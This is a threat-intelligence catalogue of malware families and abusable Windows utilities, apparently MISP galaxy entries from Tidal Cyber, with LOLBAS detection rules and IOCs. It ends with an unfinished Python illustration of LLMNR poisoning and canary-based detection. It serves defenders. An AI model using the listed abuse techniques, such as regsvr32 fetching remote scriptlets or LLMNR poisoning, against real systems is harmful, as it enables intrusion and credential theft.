[Ramsay](https://app.tidalcyber.com/software/dc307b3c-9bc5-4624-b0bc-4807fa1fc57b) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://app.tidalcyber.com/software/dc307b3c-9bc5-4624-b0bc-4807fa1fc57b) and the [Darkhotel](https://app.tidalcyber.com/groups/efa1d922-8f48-43a6-89fe-237e1f3812c8)-associated Retro malware.<sup>[[Eset Ramsay May 2020](https://app.tidalcyber.com/references/3c149b0b-f37c-4d4e-aa61-351c87fd57ce)]</sup><sup>[[Antiy CERT Ramsay April 2020](https://app.tidalcyber.com/references/280636da-fa21-472c-947c-651a628ea2cd)]</sup>

The tag is: misp-galaxy:software="Ramsay"

Rasautou.exe - Associated Software

<sup>[[Rasautou.exe - LOLBAS Project](/references/dc299f7a-403b-4a22-9386-0be3e160d185)]</sup>

The tag is: misp-galaxy:software="Rasautou.exe - Associated Software"

Rasautou

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Remote Access Dialer

Author: Tony Lambert

Paths: * C:\Windows\System32\rasautou.exe

Detection:

* Sigma: [win_rasautou_dll_execution.yml](https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml)
* IOC: rasautou.exe command line containing -d and -p<sup>[[Rasautou.exe - LOLBAS Project](/references/dc299f7a-403b-4a22-9386-0be3e160d185)]</sup>

The tag is: misp-galaxy:software="Rasautou"

Raspberry Robin

A highly active worm that spreads through removable media devices and abuses built-in Windows utilities after initial infection of the host. Raspberry Robin has evolved into a major malware delivery threat, with links to infections involving Cobalt Strike, SocGholish, Truebot, and ultimately ransomware.<sup>[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)]</sup>

Delivers: Cobalt Strike<sup>[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)]</sup>, SocGholish<sup>[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)]</sup>, Truebot<sup>[[Microsoft Security Raspberry Robin October 2022](/references/8017e42a-8373-4d24-8d89-638a925b704b)]</sup><sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/raspberryrobin/

The tag is: misp-galaxy:software="Raspberry Robin"

RATANKBA

[RATANKBA](https://app.tidalcyber.com/software/40466d7d-a107-46aa-a6fc-180e0eef2c6b) is a remote controller tool used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). [RATANKBA](https://app.tidalcyber.com/software/40466d7d-a107-46aa-a6fc-180e0eef2c6b) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://app.tidalcyber.com/software/40466d7d-a107-46aa-a6fc-180e0eef2c6b) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. <sup>[[Lazarus RATANKBA](https://app.tidalcyber.com/references/e3f9853f-29b0-4219-a488-a6ecfa16b09f)]</sup> <sup>[[RATANKBA](https://app.tidalcyber.com/references/7d08ec64-7fb8-4520-b26b-95b0dee891fe)]</sup>

The tag is: misp-galaxy:software="RATANKBA"

RawDisk

[RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.<sup>[[EldoS RawDisk ITpro](https://app.tidalcyber.com/references/a6cf3d1d-2310-42bb-9324-495b4e94d329)]</sup><sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>

The tag is: misp-galaxy:software="RawDisk"

FIENDCRY - Associated Software

The FIENDCRY component is a memory scraper based on MemPDump that scans through process memory looking for regular expressions. Its stage 1 component scans all processes, and its stage 2 component targets a specific process of interest. <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup> <sup>[[Github Mempdump](https://app.tidalcyber.com/references/f830ed8b-33fa-4d1e-a66c-41f8c6aba69c)]</sup> <sup>[[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]</sup>

The tag is: misp-galaxy:software="FIENDCRY - Associated Software"

DUEBREW - Associated Software

The DUEBREW component is a Perl2Exe binary launcher. <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup> <sup>[[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]</sup>

The tag is: misp-galaxy:software="DUEBREW - Associated Software"

DRIFTWOOD - Associated Software

The DRIFTWOOD component is a Perl2Exe compiled Perl script used by G0053 after they have identified data of interest on victims. <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup> <sup>[[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]</sup>

The tag is: misp-galaxy:software="DRIFTWOOD - Associated Software"

RawPOS

[RawPOS](https://app.tidalcyber.com/software/6ea1bf95-fed8-4b94-8071-aa19a3af5e34) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. <sup>[[Kroll RawPOS Jan 2017](https://app.tidalcyber.com/references/cbbfffb9-c378-4e57-a2af-e76e6014ed57)]</sup> <sup>[[TrendMicro RawPOS April 2015](https://app.tidalcyber.com/references/e483ed86-713b-42c6-ad77-e9b889bbcb81)]</sup> <sup>[[Visa RawPOS March 2015](https://app.tidalcyber.com/references/a2371f44-0a88-4d68-bbe7-7e79f13f78c2)]</sup> FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup> <sup>[[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]</sup>

The tag is: misp-galaxy:software="RawPOS"

Rclone

[Rclone](https://app.tidalcyber.com/software/1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://app.tidalcyber.com/software/1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) and DarkSide Ransomware-as-a-Service operations.<sup>[[Rclone](https://app.tidalcyber.com/references/3c7824de-d958-4254-beec-bc4e5ab989b0)]</sup><sup>[[Rclone Wars](https://app.tidalcyber.com/references/d47e5f7c-cf70-4f7c-ac83-57e4e1187485)]</sup><sup>[[Detecting Rclone](https://app.tidalcyber.com/references/2e44290c-32f5-4e7f-96de-9874df79fe89)]</sup><sup>[[DarkSide Ransomware Gang](https://app.tidalcyber.com/references/5f8d49e8-22da-425f-b63b-a799b97ec2b5)]</sup><sup>[[DFIR Conti Bazar Nov 2021](https://app.tidalcyber.com/references/a6f1a15d-448b-41d4-81f0-ee445cba83bd)]</sup>

The tag is: misp-galaxy:software="Rclone"

RCSession

[RCSession](https://app.tidalcyber.com/software/38c4d208-fe38-4965-871c-709fa1479ba3) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) and by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) (Type II Backdoor).<sup>[[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)]</sup><sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup><sup>[[Trend Micro DRBControl February 2020](https://app.tidalcyber.com/references/4dfbf26d-023b-41dd-82c8-12fe18cb10e6)]</sup>

The tag is: misp-galaxy:software="RCSession"

rcsi.exe - Associated Software

<sup>[[rcsi.exe - LOLBAS Project](/references/dc02058a-7ed3-4253-a976-6f99b9e91406)]</sup>

The tag is: misp-galaxy:software="rcsi.exe - Associated Software"

rcsi

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Non-interactive command line interface included with Visual Studio.

Author: Oddvar Moe

Paths: * no default

The tag is: misp-galaxy:software="rcsi"

RDAT

[RDAT](https://app.tidalcyber.com/software/567da30e-fd4d-4ec5-a308-bf08788f3bfb) is a backdoor used by the suspected Iranian threat group [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2). [RDAT](https://app.tidalcyber.com/software/567da30e-fd4d-4ec5-a308-bf08788f3bfb) was originally identified in 2017 and targeted companies in the telecommunications sector.<sup>[[Unit42 RDAT July 2020](https://app.tidalcyber.com/references/2929baa5-ead7-4936-ab67-c4742afc473c)]</sup>

The tag is: misp-galaxy:software="RDAT"

RDFSNIFFER

[RDFSNIFFER](https://app.tidalcyber.com/software/ca4e973c-da15-46a9-8f3a-0b1560c9a783) is a module loaded by [BOOSTWRITE](https://app.tidalcyber.com/software/74a73624-d53b-4c84-a14b-8ae964fd577c) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.<sup>[[FireEye FIN7 Oct 2019](https://app.tidalcyber.com/references/df8886d1-fbd7-4c24-8ab1-6261923dee96)]</sup>

The tag is: misp-galaxy:software="RDFSNIFFER"

RDP Recognizer

RDP Recognizer is a tool that can be used to brute force RDP passwords and check for RDP vulnerabilities. U.S. authorities observed BianLian Ransomware Group actors downloading the tool during intrusions.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

The tag is: misp-galaxy:software="RDP Recognizer"

rdrleakdiag.exe - Associated Software

<sup>[[rdrleakdiag.exe - LOLBAS Project](/references/1feff728-2230-4a45-bd64-6093f8b42646)]</sup>

The tag is: misp-galaxy:software="rdrleakdiag.exe - Associated Software"

rdrleakdiag

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Windows resource leak diagnostic tool

Author: John Dwyer

Paths:

* c:\windows\system32\rdrleakdiag.exe
* c:\Windows\SysWOW64\rdrleakdiag.exe

The tag is: misp-galaxy:software="rdrleakdiag"

Reaver

[Reaver](https://app.tidalcyber.com/software/ca544771-d43e-4747-80e5-cf0f4a4836f3) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel](https://app.tidalcyber.com/technique/b5cc9ab3-6501-4c50-904e-1a25a4088125) items.<sup>[[Palo Alto Reaver Nov 2017](https://app.tidalcyber.com/references/69fbe527-2ec4-457b-81b1-2eda65eb8442)]</sup>

The tag is: misp-galaxy:software="Reaver"

BUGJUICE - Associated Software

Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named BUGJUICE by FireEye is likely the same as the malware RedLeaves. <sup>[[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]</sup> <sup>[[Twitter Nick Carr APT10](https://app.tidalcyber.com/references/0f133f2c-3b02-4b3b-a960-ef6a7862cf8f)]</sup>

The tag is: misp-galaxy:software="BUGJUICE - Associated Software"

RedLeaves

[RedLeaves](https://app.tidalcyber.com/software/5264c3ab-14e1-4ae1-854e-889ebde029b4) is a malware family used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322). The code overlaps with [PlugX](https://app.tidalcyber.com/software/070b56f4-7810-4dad-b85f-bdfce9c08c10) and may be based upon the open source tool Trochilus. <sup>[[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]</sup> <sup>[[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]</sup>

The tag is: misp-galaxy:software="RedLeaves"

reg.exe - Associated Software

The tag is: misp-galaxy:software="reg.exe - Associated Software"

Reg

[Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. <sup>[[Microsoft Reg](https://app.tidalcyber.com/references/1e1b21bd-18b3-4c77-8eb8-911b028ab603)]</sup>

Utilities such as [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) are known to be used by persistent threats. <sup>[[Windows Commands JPCERT](https://app.tidalcyber.com/references/9d935f7f-bc2a-4d09-a51a-82074ffd7d77)]</sup>

The tag is: misp-galaxy:software="Reg"

Regasm.exe - Associated Software

<sup>[[LOLBAS Regasm](/references/b6a3356f-72c2-4ec2-a276-2432eb691055)]</sup>

The tag is: misp-galaxy:software="Regasm.exe - Associated Software"

Regasm

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Part of .NET

Author: Oddvar Moe

Paths:

* C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe

The tag is: misp-galaxy:software="Regasm"

RegDuke

[RegDuke](https://app.tidalcyber.com/software/52dc08d8-82cc-46dc-91ae-383193d72963) is a first stage implant written in .NET and used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2017. [RegDuke](https://app.tidalcyber.com/software/52dc08d8-82cc-46dc-91ae-383193d72963) has been used to control a compromised machine when control of other implants on the machine was lost.<sup>[[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)]</sup>

The tag is: misp-galaxy:software="RegDuke"

Regedit.exe - Associated Software

<sup>[[Regedit.exe - LOLBAS Project](/references/86e47198-751b-4754-8741-6dd8f2960416)]</sup>

The tag is: misp-galaxy:software="Regedit.exe - Associated Software"

Regedit

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to manipulate registry

Author: Oddvar Moe

Paths: * C:\Windows\regedit.exe

Detection:

* Sigma: [proc_creation_win_regedit_import_keys_ads.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml)
* IOC: regedit.exe reading and writing to alternate data stream
* IOC: regedit.exe should normally not be executed by end-users<sup>[[Regedit.exe - LOLBAS Project](/references/86e47198-751b-4754-8741-6dd8f2960416)]</sup>

The tag is: misp-galaxy:software="Regedit"

Regin

[Regin](https://app.tidalcyber.com/software/e88bf527-bb9c-45c3-b86b-04a07dcd91fd) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://app.tidalcyber.com/software/e88bf527-bb9c-45c3-b86b-04a07dcd91fd) timestamps date back to 2003. <sup>[[Kaspersky Regin](https://app.tidalcyber.com/references/1b521b76-5b8f-4bd9-b312-7c795fc97898)]</sup>

The tag is: misp-galaxy:software="Regin"

Regini.exe - Associated Software

<sup>[[Regini.exe - LOLBAS Project](/references/db2573d2-6ecd-4c5a-b038-2f799f9723ae)]</sup>

The tag is: misp-galaxy:software="Regini.exe - Associated Software"

Regini

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to manipulate the registry

Author: Oddvar Moe

Paths:

* C:\Windows\System32\regini.exe
* C:\Windows\SysWOW64\regini.exe

Detection:

* Sigma: [proc_creation_win_regini_ads.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml)
* Sigma: [proc_creation_win_regini_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml)
* IOC: regini.exe reading from ADS<sup>[[Regini.exe - LOLBAS Project](/references/db2573d2-6ecd-4c5a-b038-2f799f9723ae)]</sup>

The tag is: misp-galaxy:software="Regini"

Register-cimprovider.exe - Associated Software

<sup>[[Register-cimprovider.exe - LOLBAS Project](/references/d445d016-c4f1-45c8-929d-913867275417)]</sup>

The tag is: misp-galaxy:software="Register-cimprovider.exe - Associated Software"

Register-cimprovider

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to register new wmi providers

Author: Oddvar Moe

Paths:

* C:\Windows\System32\Register-cimprovider.exe
* C:\Windows\SysWOW64\Register-cimprovider.exe

Detection:

* Sigma: [proc_creation_win_susp_register_cimprovider.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml)
* IOC: Register-cimprovider.exe execution and cmdline DLL load may be suspicious<sup>[[Register-cimprovider.exe - LOLBAS Project](/references/d445d016-c4f1-45c8-929d-913867275417)]</sup>

The tag is: misp-galaxy:software="Register-cimprovider"

Regsvcs.exe - Associated Software

<sup>[[LOLBAS Regsvcs](/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)]</sup>

The tag is: misp-galaxy:software="Regsvcs.exe - Associated Software"

Regsvcs

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies

Author: Oddvar Moe

Paths:

* c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
* c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe

Detection:

* Sigma: [proc_creation_win_lolbin_regasm.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml)
* Elastic: [execution_register_server_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml)
* Splunk: detect_regsvcs_with_network_connection.yml<sup>[[LOLBAS Regsvcs](/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)]</sup>

The tag is: misp-galaxy:software="Regsvcs"

Regsvr32.exe - Associated Software

<sup>[[LOLBAS Regsvr32](/references/8e32abef-534e-475a-baad-946b6ec681c1)]</sup>

The tag is: misp-galaxy:software="Regsvr32.exe - Associated Software"

Regsvr32

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to register dlls

Author: Oddvar Moe

Paths:

* C:\Windows\System32\regsvr32.exe
* C:\Windows\SysWOW64\regsvr32.exe

Detection:

* Sigma: [proc_creation_win_regsvr32_susp_parent.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml)
* Sigma: [proc_creation_win_regsvr32_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml)
* Sigma: [proc_creation_win_regsvr32_susp_exec_path_1.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml)
* Sigma: [proc_creation_win_regsvr32_network_pattern.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml)
* Sigma: [net_connection_win_regsvr32_network_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml)
* Sigma: [dns_query_win_regsvr32_network_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml)
* Sigma: [proc_creation_win_regsvr32_flags_anomaly.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml)
* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)
* Splunk: [detect_regsvr32_application_control_bypass.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml)
* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)
* Elastic: [execution_register_server_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml)
* IOC: regsvr32.exe retrieving files from Internet
* IOC: regsvr32.exe executing scriptlet (sct) files
* IOC: DotNet CLR libraries loaded into regsvr32.exe
* IOC: DotNet CLR Usage Log - regsvr32.exe.log<sup>[[LOLBAS Regsvr32](/references/8e32abef-534e-475a-baad-946b6ec681c1)]</sup>

The tag is: misp-galaxy:software="Regsvr32"

Remcos

[Remcos](https://app.tidalcyber.com/software/2eb92fa8-514e-4018-adc4-c9fe4f082567) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://app.tidalcyber.com/software/2eb92fa8-514e-4018-adc4-c9fe4f082567) has been observed being used in malware campaigns.<sup>[[Riskiq Remcos Jan 2018](https://app.tidalcyber.com/references/a641a41c-dcd8-47e5-9b29-109dd2eb7f1e)]</sup><sup>[[Talos Remcos Aug 2018](https://app.tidalcyber.com/references/c5cb2eff-ed48-47ff-bfd6-79152bf51430)]</sup>

The tag is: misp-galaxy:software="Remcos"

Remexi

[Remexi](https://app.tidalcyber.com/software/82d0bb4d-4711-49e3-9fe5-c522bbe5e8bb) is a Windows-based Trojan that was developed in the C programming language.<sup>[[Securelist Remexi Jan 2019](https://app.tidalcyber.com/references/07dfd8e7-4e51-4c6e-a4f6-aaeb74ff8845)]</sup>

The tag is: misp-galaxy:software="Remexi"

Remote.exe - Associated Software

<sup>[[Remote.exe - LOLBAS Project](/references/9a298f83-80b8-45a3-9f63-6119be6621b4)]</sup>

The tag is: misp-galaxy:software="Remote.exe - Associated Software"

Remote

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Debugging tool included with Windows Debugging Tools

Author: mr.d0x

Paths:

* C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe

Detection:

* IOC: remote.exe process spawns
* Sigma: proc_creation_win_lolbin_remote.yml<sup>[[Remote.exe - LOLBAS Project](/references/9a298f83-80b8-45a3-9f63-6119be6621b4)]</sup>

The tag is: misp-galaxy:software="Remote"

RemoteCMD

[RemoteCMD](https://app.tidalcyber.com/software/57fa64ea-975a-470a-a194-3428148ae9ee) is a custom tool used by [APT3](https://app.tidalcyber.com/groups/9da726e6-af02-49b8-8ebe-7ea4235513c9) to execute commands on a remote system similar to SysInternal’s PSEXEC functionality. <sup>[[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]</sup>

The tag is: misp-galaxy:software="RemoteCMD"

RemoteUtilities

[RemoteUtilities](https://app.tidalcyber.com/software/8a7fa0df-c688-46be-94bf-462fae33b788) is a legitimate remote administration tool that has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least 2021 for execution on target machines.<sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:software="RemoteUtilities"

ProjectSauron - Associated Software

ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. <sup>[[Kaspersky ProjectSauron Blog](https://app.tidalcyber.com/references/baeaa632-3fa5-4d2b-9537-ccc7674fd7d6)]</sup>

The tag is: misp-galaxy:software="ProjectSauron - Associated Software"

Backdoor.Remsec - Associated Software

The tag is: misp-galaxy:software="Backdoor.Remsec - Associated Software"

Remsec

[Remsec](https://app.tidalcyber.com/software/e3729cff-f25e-4c01-a7a1-e8b83e903b30) is a modular backdoor that has been used by [Strider](https://app.tidalcyber.com/groups/deb573c6-071a-4b50-9e92-4aa648d8bdc1) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. <sup>[[Symantec Strider Blog](https://app.tidalcyber.com/references/664eac41-257f-4d4d-aba5-5d2e8e2117a7)]</sup>

The tag is: misp-galaxy:software="Remsec"

Replace.exe - Associated Software

<sup>[[Replace.exe - LOLBAS Project](/references/82a473e9-208c-4c47-bf38-92aee43238dd)]</sup>

The tag is: misp-galaxy:software="Replace.exe - Associated Software"

Replace

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to replace file with another file

Author: Oddvar Moe

Paths:

* C:\Windows\System32\replace.exe
* C:\Windows\SysWOW64\replace.exe

Detection:

* IOC: Replace.exe retrieving files from remote server
* Sigma: proc_creation_win_lolbin_replace.yml<sup>[[Replace.exe - LOLBAS Project](/references/82a473e9-208c-4c47-bf38-92aee43238dd)]</sup>

The tag is: misp-galaxy:software="Replace"

Responder

Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. <sup>[[GitHub Responder](https://app.tidalcyber.com/references/3ef681a9-4ab0-420b-9d1a-b8152c50b3ca)]</sup>

The tag is: misp-galaxy:software="Responder"
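
LLMNR poisoning works because any host on the link may answer a multicast name query, so a tool like Responder simply answers every query with its own address. The following is an added illustration, not code from Responder or from this galaxy: it lays out the LLMNR query and answer wire format (the DNS-style header of RFC 4795), builds the kind of spoofed A-record reply a poisoner returns, and applies the common defensive check of probing for a canary name that no legitimate host owns. The canary name, transaction ID and the 192.0.2.x address are constructed for the example; a real probe would be sent to the LLMNR group 224.0.0.252:5355 over UDP.

```python
"""Added example (not Responder's code): LLMNR query/answer layout per RFC 4795
and a canary-name check for poisoners. All packets are constructed inline."""
from __future__ import annotations

import socket
import struct

LLMNR_GROUP = ("224.0.0.252", 5355)   # where real probes would be sent
QR_BIT = 0x8000                        # header flag that marks a response


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name: str, txid: int) -> bytes:
    """DNS-style header with one A/IN question and no answers."""
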